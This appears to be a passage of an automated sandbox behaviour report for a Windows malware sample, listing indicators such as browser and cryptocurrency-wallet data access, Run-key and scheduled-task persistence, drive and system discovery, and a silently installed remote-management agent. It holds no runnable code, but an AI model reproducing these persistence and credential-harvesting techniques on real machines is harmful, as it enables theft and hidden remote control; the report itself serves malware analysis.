Key opened \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d42f45addf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\d42f45addf.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e378e7234d.exe = "C:\\Users\\Admin\\1000029002\\e378e7234d.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Sql.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\python27.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\QtWebEngineProcess.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\curtainmode\CurtainMode64.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Xml.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\resources\COMODO\oem.rcc C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriver-manifest.ini C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_x86-PipelineConfig.xml C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_pdf_x64-PipelineConfig.xml C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\log4cplusU.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5PrintSupport.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Qml.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\qtwebengine_resources.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_pdf_x86-PipelineConfig.xml C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\enrollment_settings.ini C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\webrtc-plugin.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\edr-plugin.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_x64-PipelineConfig.xml C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\curtainmode\CurtainMode32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\offline_mode.ini C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\rmmproxy.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\ssh-shellhost.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5QuickWidgets.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\d3dcompiler_47.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Network.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Widgets.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\CatUninstaller.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5WebEngine.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\libEGL.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\RHost.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\itsm\__init__.py C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\vcruntime140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\token.ini C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_x86.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\proxy_settings.ini C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\sqldrivers\qsqlite.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Gui.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\libGLESV2.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\qtwebengine_resources_200p.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\concrt140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\plugindlls\MaintenanceWindowPlugin.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5WebEngineCore.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\msvcp140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\imageformats\qjpeg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\screenhooks32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\ItsmRsp.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5Quick.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\qtwebengine_resources_100p.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\imageformats\qgif.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriver.inf C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\qdjango-db0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\RmmService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\imageformats\qico.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_x64.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\RCVirtualPrintDriver.gpd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\platforms\qwindows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\torrent-plugin.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\RDesktop.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\rcvirtualprintdriver.cat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Qt5WebEngineWidgets.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\SourceHash{373FFE70-5FF7-492D-A2F4-0C6A15D8D503} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC7B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICDA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI65D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI834.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI804.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe N/A
File created C:\Windows\Installer\e5d0468.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5d0468.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI61D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7D5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID39.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\explorti.job C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\1000029002\e378e7234d.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\1000029002\e378e7234d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\kcsnc\glhe.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
